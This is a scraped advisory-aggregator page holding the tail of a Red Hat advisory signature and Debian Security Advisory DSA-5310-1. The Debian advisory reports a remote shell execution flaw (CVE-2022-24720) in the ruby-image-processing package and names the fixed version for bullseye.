OtTUIPiNcx/ag0nFZXiJAg9Fpm1zsZ/vtijr+0g1zOwDH+jxsD6Jls0B2hvJ231+  
MGpfDLLSbAiGPBi+h6bfS/5B0pVnBPzwIqHDuw88pZ65oTvYrSbesBxQRwSlpoLx  
KVNaZLcI1un3Tnj0B+g1PTenIoZr4t2ew5a1UBHG6922PfhpjkkGZkEMMGXhS39u  
IoDnZ86D6EwKgfgkI3DRvWROyllD3Uwn2K2LxWbGa3h6kgpIpLAwsBLs46pnoyYm  
F0SFZk/dLqWfAlQdBuQf9puG9b/UgF9afz/Sd823QItmV53i0K9969PKJTXd7hKV  
kup5w8Q+DXPB4QkVkirX/45vw8HynC3f+3v2PtIG4RX4vmavIKa7KH/GyQP+jKfj  
I42jho3Bof5QH2HYuYOPrsxc1Q9kuyNPy6C8q4kwj42I3T7uWnn1eztodGniv2qN  
ewOpSbIvQF9qgnpoDGSAydp6AfWq1hXLApWgq3Q3gwp/Bw4CVRF9BNaiGO92Qan8  
Jh6jVdoBrLlpQeTeG3KNSA/cuagQzDFOlNPGAlRweoZd8HU1DKtbKVAWiy98WkcZ  
wX6h+/MheGxofaA5JKNpmF5T8a+6x5fOlLQW9DFxHtNXWPI6TpWp9aC0F2TOgjqt  
4lvL+q5bFIM=2oN+  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0004-01

Debian Linux Security Advisory 5310-1 - It was discovered that ruby-image-processing, a ruby package that provides higher-level image processing helpers, is prone to a remote shell execution vulnerability when using the #apply method to apply a series of operations coming from unsanitized user input.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5310-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoDecember 31, 2022                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ruby-image-processingCVE ID         : CVE-2022-24720Debian Bug     : 1007225It was discovered that ruby-image-processing, a ruby package thatprovides higher-level image processing helpers, is prone to a remoteshell execution vulnerability when using the #apply method to apply aseries of operations coming from unsanitized user input.For the stable distribution (bullseye), this problem has been fixed inversion 1.10.3-1+deb11u1.We recommend that you upgrade your ruby-image-processing packages.For the detailed security status of ruby-image-processing please referto its security tracker page at:https://security-tracker.debian.org/tracker/ruby-image-processingFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmOwA+1fFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0TryQ/5AUPT7LHsRt88T20BS/X9gDvJogsk2Sm5YdjL3PUKOaRyE0Vrz6F6nFQlnRGCwg26d1KGSrjS997RzkataRunBfjfTyiXjnHct8oRi3kz1tHimjmeyxv3+3CjC11TipNbMJA2zC85xeHBrNTdSpw7nJWMZ1awSTHeo1RIDUVasZ250pGoDf3eloNZ6rOpmHS75VqUhss2CpR/LicpZKg0Jov1/x21KY+hzDPFJ24j4IAeLTNURt33nuaWtsoxDAT6duN1QA0hZ3B8rec4EIPE1ZVROcQtjAl+rDegtXKCTujFD7qTEt3wmUnVX8BrdzFLHCel+Fj5V0sah8tVo+v+lzjYD1tzCO7b6tOFGDgavZHHWXSKiQjkKy+1ovarp0fftjwminnstlS7+ZlKMGYRoYVmcvrK8RZlvKjhceTyT+BtaYkaDvpsBdm+xp8ghx28jgIK/Mn+1jYqiEtD2GciOs0SAVPWq5hit9I3kXZ6x/u3waTvw0Du24q3bimDD4o36JzdwOKcqRzKZVersdI17oMQ2CV1tyeeUnN7eEe59MfoKC3xCR7JfaokxpOvVzmYbO5p7s0VuwjLti9XhCc0mzhfNJzpvyJ3o3quBd7pr26FCLk1vt6uwTPb/q99Q32Jdm6lepKJeop9VRDO3epNmN8xSrDvqY/2Ho/ycq5owAg=GQyz-----END PGP SIGNATURE-----

Tag

#linux